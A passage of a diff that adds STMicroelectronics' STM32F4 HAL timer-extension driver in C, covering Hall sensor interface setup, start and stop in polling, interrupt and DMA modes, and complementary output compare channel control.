HAL_GPIO_Init(); + + (#) The external Clock can be configured, if needed (the default clock is the + internal clock from the APBx), using the following function: + HAL_TIM_ConfigClockSource, the clock configuration should be done before + any start function. + + (#) Configure the TIM in the desired functioning mode using one of the + initialization function of this driver: + (++) HAL_TIMEx_HallSensor_Init() and HAL_TIMEx_ConfigCommutEvent(): to use the + Timer Hall Sensor Interface and the commutation event with the corresponding + Interrupt and DMA request if needed (Note that One Timer is used to interface + with the Hall sensor Interface and another Timer should be used to use + the commutation event). + + (#) Activate the TIM peripheral using one of the start functions: + (++) Complementary Output Compare : HAL_TIMEx_OCN_Start(), HAL_TIMEx_OCN_Start_DMA(), + HAL_TIMEx_OCN_Start_IT() + (++) Complementary PWM generation : HAL_TIMEx_PWMN_Start(), HAL_TIMEx_PWMN_Start_DMA(), + HAL_TIMEx_PWMN_Start_IT() + (++) Complementary One-pulse mode output : HAL_TIMEx_OnePulseN_Start(), HAL_TIMEx_OnePulseN_Start_IT() + (++) Hall Sensor output : HAL_TIMEx_HallSensor_Start(), HAL_TIMEx_HallSensor_Start_DMA(), + HAL_TIMEx_HallSensor_Start_IT(). + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup TIMEx TIMEx + * @brief TIM Extended HAL module driver + * @{ + */ + +#ifdef HAL_TIM_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +static void TIM_DMADelayPulseNCplt(DMA_HandleTypeDef *hdma); +static void TIM_DMAErrorCCxN(DMA_HandleTypeDef *hdma); +static void TIM_CCxNChannelCmd(TIM_TypeDef *TIMx, uint32_t Channel, uint32_t ChannelNState); + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup TIMEx_Exported_Functions TIM Extended Exported Functions + * @{ + */ + +/** @defgroup TIMEx_Exported_Functions_Group1 Extended Timer Hall Sensor functions + * @brief Timer Hall Sensor functions + * +@verbatim + ============================================================================== + ##### Timer Hall Sensor functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Initialize and configure TIM HAL Sensor. + (+) De-initialize TIM HAL Sensor. + (+) Start the Hall Sensor Interface. + (+) Stop the Hall Sensor Interface. + (+) Start the Hall Sensor Interface and enable interrupts. + (+) Stop the Hall Sensor Interface and disable interrupts. + (+) Start the Hall Sensor Interface and enable DMA transfers. + (+) Stop the Hall Sensor Interface and disable DMA transfers. + +@endverbatim + * @{ + */ +/** + * @brief Initializes the TIM Hall Sensor Interface and initialize the associated handle. + * @note When the timer instance is initialized in Hall Sensor Interface mode, + * timer channels 1 and channel 2 are reserved and cannot be used for + * other purpose. + * @param htim TIM Hall Sensor Interface handle + * @param sConfig TIM Hall Sensor configuration structure + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_Init(TIM_HandleTypeDef *htim, TIM_HallSensor_InitTypeDef *sConfig) +{ + TIM_OC_InitTypeDef OC_Config; + + /* Check the TIM handle allocation */ + if (htim == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(htim->Instance)); + assert_param(IS_TIM_COUNTER_MODE(htim->Init.CounterMode)); + assert_param(IS_TIM_CLOCKDIVISION_DIV(htim->Init.ClockDivision)); + assert_param(IS_TIM_AUTORELOAD_PRELOAD(htim->Init.AutoReloadPreload)); + assert_param(IS_TIM_IC_POLARITY(sConfig->IC1Polarity)); + assert_param(IS_TIM_IC_PRESCALER(sConfig->IC1Prescaler)); + assert_param(IS_TIM_IC_FILTER(sConfig->IC1Filter)); + + if (htim->State == HAL_TIM_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + htim->Lock = HAL_UNLOCKED; + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + /* Reset interrupt callbacks to legacy week callbacks */ + TIM_ResetCallback(htim); + + if (htim->HallSensor_MspInitCallback == NULL) + { + htim->HallSensor_MspInitCallback = HAL_TIMEx_HallSensor_MspInit; + } + /* Init the low level hardware : GPIO, CLOCK, NVIC */ + htim->HallSensor_MspInitCallback(htim); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC and DMA */ + HAL_TIMEx_HallSensor_MspInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + } + + /* Set the TIM state */ + htim->State = HAL_TIM_STATE_BUSY; + + /* Configure the Time base in the Encoder Mode */ + TIM_Base_SetConfig(htim->Instance, &htim->Init); + + /* Configure the Channel 1 as Input Channel to interface with the three Outputs of the Hall sensor */ + TIM_TI1_SetConfig(htim->Instance, sConfig->IC1Polarity, TIM_ICSELECTION_TRC, sConfig->IC1Filter); + + /* Reset the IC1PSC Bits */ + htim->Instance->CCMR1 &= ~TIM_CCMR1_IC1PSC; + /* Set the IC1PSC value */ + htim->Instance->CCMR1 |= sConfig->IC1Prescaler; + + /* Enable the Hall sensor interface (XOR function of the three inputs) */ + htim->Instance->CR2 |= TIM_CR2_TI1S; + + /* Select the TIM_TS_TI1F_ED signal as Input trigger for the TIM */ + htim->Instance->SMCR &= ~TIM_SMCR_TS; + htim->Instance->SMCR |= TIM_TS_TI1F_ED; + + /* Use the TIM_TS_TI1F_ED signal to reset the TIM counter each edge detection */ + htim->Instance->SMCR &= ~TIM_SMCR_SMS; + htim->Instance->SMCR |= TIM_SLAVEMODE_RESET; + + /* Program channel 2 in PWM 2 mode with the desired Commutation_Delay*/ + OC_Config.OCFastMode = TIM_OCFAST_DISABLE; + OC_Config.OCIdleState = TIM_OCIDLESTATE_RESET; + OC_Config.OCMode = TIM_OCMODE_PWM2; + OC_Config.OCNIdleState = TIM_OCNIDLESTATE_RESET; + OC_Config.OCNPolarity = TIM_OCNPOLARITY_HIGH; + OC_Config.OCPolarity = TIM_OCPOLARITY_HIGH; + OC_Config.Pulse = sConfig->Commutation_Delay; + + TIM_OC2_SetConfig(htim->Instance, &OC_Config); + + /* Select OC2REF as trigger output on TRGO: write the MMS bits in the TIMx_CR2 + register to 101 */ + htim->Instance->CR2 &= ~TIM_CR2_MMS; + htim->Instance->CR2 |= TIM_TRGO_OC2REF; + + /* Initialize the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_READY; + + /* Initialize the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Initialize the TIM state*/ + htim->State = HAL_TIM_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the TIM Hall Sensor interface + * @param htim TIM Hall Sensor Interface handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_DeInit(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_INSTANCE(htim->Instance)); + + htim->State = HAL_TIM_STATE_BUSY; + + /* Disable the TIM Peripheral Clock */ + __HAL_TIM_DISABLE(htim); + +#if (USE_HAL_TIM_REGISTER_CALLBACKS == 1) + if (htim->HallSensor_MspDeInitCallback == NULL) + { + htim->HallSensor_MspDeInitCallback = HAL_TIMEx_HallSensor_MspDeInit; + } + /* DeInit the low level hardware */ + htim->HallSensor_MspDeInitCallback(htim); +#else + /* DeInit the low level hardware: GPIO, CLOCK, NVIC */ + HAL_TIMEx_HallSensor_MspDeInit(htim); +#endif /* USE_HAL_TIM_REGISTER_CALLBACKS */ + + /* Change the DMA burst operation state */ + htim->DMABurstState = HAL_DMA_BURST_STATE_RESET; + + /* Change the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_RESET); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_RESET); + + /* Change TIM state */ + htim->State = HAL_TIM_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(htim); + + return HAL_OK; +} + +/** + * @brief Initializes the TIM Hall Sensor MSP. + * @param htim TIM Hall Sensor Interface handle + * @retval None + */ +__weak void HAL_TIMEx_HallSensor_MspInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIMEx_HallSensor_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitializes TIM Hall Sensor MSP. + * @param htim TIM Hall Sensor Interface handle + * @retval None + */ +__weak void HAL_TIMEx_HallSensor_MspDeInit(TIM_HandleTypeDef *htim) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(htim); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_TIMEx_HallSensor_MspDeInit could be implemented in the user file + */ +} + +/** + * @brief Starts the TIM Hall Sensor Interface. + * @param htim TIM Hall Sensor Interface handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_Start(TIM_HandleTypeDef *htim) +{ + uint32_t tmpsmcr; + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(htim->Instance)); + + /* Check the TIM channels state */ + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the Input Capture channel 1 + (in the Hall Sensor Interface the three possible channels that can be used are TIM_CHANNEL_1, + TIM_CHANNEL_2 and TIM_CHANNEL_3) */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Hall sensor Interface. + * @param htim TIM Hall Sensor Interface handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_Stop(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(htim->Instance)); + + /* Disable the Input Capture channels 1, 2 and 3 + (in the Hall Sensor Interface the three possible channels that can be used are TIM_CHANNEL_1, + TIM_CHANNEL_2 and TIM_CHANNEL_3) */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Hall Sensor Interface in interrupt mode. + * @param htim TIM Hall Sensor Interface handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_Start_IT(TIM_HandleTypeDef *htim) +{ + uint32_t tmpsmcr; + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef channel_2_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_2); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_2_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_2); + + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(htim->Instance)); + + /* Check the TIM channels state */ + if ((channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (channel_2_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_1_state != HAL_TIM_CHANNEL_STATE_READY) + || (complementary_channel_2_state != HAL_TIM_CHANNEL_STATE_READY)) + { + return HAL_ERROR; + } + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the capture compare Interrupts 1 event */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + + /* Enable the Input Capture channel 1 + (in the Hall Sensor Interface the three possible channels that can be used are TIM_CHANNEL_1, + TIM_CHANNEL_2 and TIM_CHANNEL_3) */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Hall Sensor Interface in interrupt mode. + * @param htim TIM Hall Sensor Interface handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_Stop_IT(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(htim->Instance)); + + /* Disable the Input Capture channel 1 + (in the Hall Sensor Interface the three possible channels that can be used are TIM_CHANNEL_1, + TIM_CHANNEL_2 and TIM_CHANNEL_3) */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + + /* Disable the capture compare Interrupts event */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channels state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_2, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Hall Sensor Interface in DMA mode. + * @param htim TIM Hall Sensor Interface handle + * @param pData The destination Buffer address. + * @param Length The length of data to be transferred from TIM peripheral to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_Start_DMA(TIM_HandleTypeDef *htim, uint32_t *pData, uint16_t Length) +{ + uint32_t tmpsmcr; + HAL_TIM_ChannelStateTypeDef channel_1_state = TIM_CHANNEL_STATE_GET(htim, TIM_CHANNEL_1); + HAL_TIM_ChannelStateTypeDef complementary_channel_1_state = TIM_CHANNEL_N_STATE_GET(htim, TIM_CHANNEL_1); + + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(htim->Instance)); + + /* Set the TIM channel state */ + if ((channel_1_state == HAL_TIM_CHANNEL_STATE_BUSY) + || (complementary_channel_1_state == HAL_TIM_CHANNEL_STATE_BUSY)) + { + return HAL_BUSY; + } + else if ((channel_1_state == HAL_TIM_CHANNEL_STATE_READY) + && (complementary_channel_1_state == HAL_TIM_CHANNEL_STATE_READY)) + { + if ((pData == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_BUSY); + } + } + else + { + return HAL_ERROR; + } + + /* Enable the Input Capture channel 1 + (in the Hall Sensor Interface the three possible channels that can be used are TIM_CHANNEL_1, + TIM_CHANNEL_2 and TIM_CHANNEL_3) */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_ENABLE); + + /* Set the DMA Input Capture 1 Callbacks */ + htim->hdma[TIM_DMA_ID_CC1]->XferCpltCallback = TIM_DMACaptureCplt; + htim->hdma[TIM_DMA_ID_CC1]->XferHalfCpltCallback = TIM_DMACaptureHalfCplt; + /* Set the DMA error callback */ + htim->hdma[TIM_DMA_ID_CC1]->XferErrorCallback = TIM_DMAError ; + + /* Enable the DMA stream for Capture 1*/ + if (HAL_DMA_Start_IT(htim->hdma[TIM_DMA_ID_CC1], (uint32_t)&htim->Instance->CCR1, (uint32_t)pData, Length) != HAL_OK) + { + /* Return error status */ + return HAL_ERROR; + } + /* Enable the capture compare 1 Interrupt */ + __HAL_TIM_ENABLE_DMA(htim, TIM_DMA_CC1); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Hall Sensor Interface in DMA mode. + * @param htim TIM Hall Sensor Interface handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_HallSensor_Stop_DMA(TIM_HandleTypeDef *htim) +{ + /* Check the parameters */ + assert_param(IS_TIM_HALL_SENSOR_INTERFACE_INSTANCE(htim->Instance)); + + /* Disable the Input Capture channel 1 + (in the Hall Sensor Interface the three possible channels that can be used are TIM_CHANNEL_1, + TIM_CHANNEL_2 and TIM_CHANNEL_3) */ + TIM_CCxChannelCmd(htim->Instance, TIM_CHANNEL_1, TIM_CCx_DISABLE); + + + /* Disable the capture compare Interrupts 1 event */ + __HAL_TIM_DISABLE_DMA(htim, TIM_DMA_CC1); + + (void)HAL_DMA_Abort_IT(htim->hdma[TIM_DMA_ID_CC1]); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM channel state */ + TIM_CHANNEL_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + TIM_CHANNEL_N_STATE_SET(htim, TIM_CHANNEL_1, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup TIMEx_Exported_Functions_Group2 Extended Timer Complementary Output Compare functions + * @brief Timer Complementary Output Compare functions + * +@verbatim + ============================================================================== + ##### Timer Complementary Output Compare functions ##### + ============================================================================== + [..] + This section provides functions allowing to: + (+) Start the Complementary Output Compare/PWM. + (+) Stop the Complementary Output Compare/PWM. + (+) Start the Complementary Output Compare/PWM and enable interrupts. + (+) Stop the Complementary Output Compare/PWM and disable interrupts. + (+) Start the Complementary Output Compare/PWM and enable DMA transfers. + (+) Stop the Complementary Output Compare/PWM and disable DMA transfers. + +@endverbatim + * @{ + */ + +/** + * @brief Starts the TIM Output Compare signal generation on the complementary + * output. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OCN_Start(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM complementary channel state */ + if (TIM_CHANNEL_N_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + /* Enable the Capture compare channel N */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Stops the TIM Output Compare signal generation on the complementary + * output. + * @param htim TIM handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OCN_Stop(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Disable the Capture compare channel N */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_DISABLE); + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief Starts the TIM Output Compare signal generation in interrupt mode + * on the complementary output. + * @param htim TIM OC handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OCN_Start_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Check the TIM complementary channel state */ + if (TIM_CHANNEL_N_STATE_GET(htim, Channel) != HAL_TIM_CHANNEL_STATE_READY) + { + return HAL_ERROR; + } + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_BUSY); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Enable the TIM Output Compare interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Enable the TIM Output Compare interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Enable the TIM Output Compare interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_CC3); + break; + } + + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Enable the TIM Break interrupt */ + __HAL_TIM_ENABLE_IT(htim, TIM_IT_BREAK); + + /* Enable the Capture compare channel N */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_ENABLE); + + /* Enable the Main Output */ + __HAL_TIM_MOE_ENABLE(htim); + + /* Enable the Peripheral, except in trigger mode where enable is automatically done with trigger */ + if (IS_TIM_SLAVE_INSTANCE(htim->Instance)) + { + tmpsmcr = htim->Instance->SMCR & TIM_SMCR_SMS; + if (!IS_TIM_SLAVEMODE_TRIGGER_ENABLED(tmpsmcr)) + { + __HAL_TIM_ENABLE(htim); + } + } + else + { + __HAL_TIM_ENABLE(htim); + } + } + + /* Return function status */ + return status; +} + +/** + * @brief Stops the TIM Output Compare signal generation in interrupt mode + * on the complementary output. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be disabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OCN_Stop_IT(TIM_HandleTypeDef *htim, uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpccer; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + switch (Channel) + { + case TIM_CHANNEL_1: + { + /* Disable the TIM Output Compare interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC1); + break; + } + + case TIM_CHANNEL_2: + { + /* Disable the TIM Output Compare interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC2); + break; + } + + case TIM_CHANNEL_3: + { + /* Disable the TIM Output Compare interrupt */ + __HAL_TIM_DISABLE_IT(htim, TIM_IT_CC3); + break; + } + + default: + status = HAL_ERROR; + break; + } + + if (status == HAL_OK) + { + /* Disable the Capture compare channel N */ + TIM_CCxNChannelCmd(htim->Instance, Channel, TIM_CCxN_DISABLE); + + /* Disable the TIM Break interrupt (only if no more channel is active) */ + tmpccer = htim->Instance->CCER; + if ((tmpccer & (TIM_CCER_CC1NE | TIM_CCER_CC2NE | TIM_CCER_CC3NE)) == (uint32_t)RESET) + { + __HAL_TIM_DISABLE_IT(htim, TIM_IT_BREAK); + } + + /* Disable the Main Output */ + __HAL_TIM_MOE_DISABLE(htim); + + /* Disable the Peripheral */ + __HAL_TIM_DISABLE(htim); + + /* Set the TIM complementary channel state */ + TIM_CHANNEL_N_STATE_SET(htim, Channel, HAL_TIM_CHANNEL_STATE_READY); + } + + /* Return function status */ + return status; +} + +/** + * @brief Starts the TIM Output Compare signal generation in DMA mode + * on the complementary output. + * @param htim TIM Output Compare handle + * @param Channel TIM Channel to be enabled + * This parameter can be one of the following values: + * @arg TIM_CHANNEL_1: TIM Channel 1 selected + * @arg TIM_CHANNEL_2: TIM Channel 2 selected + * @arg TIM_CHANNEL_3: TIM Channel 3 selected + * @param pData The source Buffer address. + * @param Length The length of data to be transferred from memory to TIM peripheral + * @retval HAL status + */ +HAL_StatusTypeDef HAL_TIMEx_OCN_Start_DMA(TIM_HandleTypeDef *htim, uint32_t Channel, uint32_t *pData, uint16_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + uint32_t tmpsmcr; + + /* Check the parameters */ + assert_param(IS_TIM_CCXN_INSTANCE(htim->Instance, Channel)); + + /* Set the TIM complementary channel state */ + if (TIM_CHANNEL_N_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_BUSY) + { + return HAL_BUSY; + } + else if (TIM_CHANNEL_N_STATE_GET(htim, Channel) == HAL_TIM_CHANNEL_STATE_READY) + { + if ((pData == NULL) && (Length > 0U)) + { + return HAL_ERROR; + } + else + { + 